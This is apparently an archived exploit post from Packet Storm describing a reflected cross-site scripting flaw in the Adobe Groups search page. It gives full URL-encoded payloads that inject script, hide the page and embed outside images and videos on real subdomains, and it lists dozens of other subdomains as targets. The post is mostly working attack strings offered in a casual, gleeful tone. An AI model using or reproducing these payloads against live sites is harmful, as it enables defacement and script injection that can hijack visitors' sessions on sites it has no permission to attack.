Adobe Groups suffers from a cross site scripting vulnerability.
1b443f2aa9acfe0a5279a5cc708ab5b3eb09a22f8d900bb72c27d01b4a75a93f;)
# Exploit Title: Adobe Groups Cross Site Scripting
# Date: 30.08.2011
# Author: Sony
# Software Link: http://groups.adobe.com/
# Blog: http://st2tea.blogspot.com/
..................................................................
Well, we can see:
http://xssed.com/mirror/71488/
Don't work and it's sadly..omg!
But..
Let's Go:
http://ria.groups.adobe.com/index.cfm?event=group.search&groupid=534
Use Live HTTP Headers:
POST /index.cfm?event=group.search&groupid=1128
keywords=1&lastactivity=Anytime&author=&type=
=1128 keywords=
John + Jane = Love
1128 + keywords = our Way
http://ria.groups.adobe.com/index.cfm?event=group.search&groupid=534&keywords=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3Cstyle%3Ebody{visibility:hidden;}%20html%20{%20background-image:%20url%28http://i53.tinypic.com/dp8jyv.jpg%29;%20}%3C/style%3E%27%22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2040px;%22%3E%3Ciframe%20width=%22560%22%20height=%22345%22%20src=%22http://www.youtube.com/embed/sFYLp-r0ZVA%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E&lastactivity=in+the+last+year&author=&type=
All Adobe Groups:
http://madnet.name/tools/madss/
cpaug.groups.adobe.com
cppug.groups.adobe.com
cpug.groups.adobe.com
creativecrew.groups.adobe.com
creativesuitesanjose.groups.adobe.com
csneworleans.groups.adobe.com
cssierra.groups.adobe.com
cswestmd.groups.adobe.com
daaug.groups.adobe.com
dallasae.groups.adobe.com
dallaspremiere.groups.adobe.com
dalpug.groups.adobe.com
dc-metro.groups.adobe.com
dccfug.groups.adobe.com
dco.groups.adobe.com
ddla.groups.adobe.com
denverflex.groups.adobe.com
denverlivecycle.groups.adobe.com
derbyaug.groups.adobe.com
desmoines.groups.adobe.com
etc..
So..what can we do?
I don't know..let's go dance!
http://nasa.groups.adobe.com/index.cfm?event=group.search&groupid=1128&keywords=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3Cstyle%3Ebody{visibility:hidden;}%20html%20{%20background-image:%20url%28http://th1192.photobucket.com/albums/aa321/Albertlinux/fundos/th_matrix.gif%29;%20}%3C/style%3E%27%22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2040px;%22%3E%3COBJECT%20width=%22470%22%20height=%22353%22%3E%3CPARAM%20name=%22movie%22%20value=%22http://video.rutube.ru/7a7148f0f6c5f92ae195cccd72dff454%22%3E%3C/PARAM%3E%3CPARAM%20name=%22wmode%22%20value=%22window%22%3E%3C/PARAM%3E%3CPARAM%20name=%22allowFullScreen%22%20value=%22true%22%3E%3C/PARAM%3E%3CEMBED%20src=%22http://video.rutube.ru/7a7148f0f6c5f92ae195cccd72dff454%22%20type=%22application/x-shockwave-flash%22%20wmode=%22window%22%20width=%22470%22%20height=%22353%22%20allowFullScreen=%22true%22%20%3E%3C/EMBED%3E%3C/OBJECT%3E&lastactivity=in+the+last+year&author=&type=
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed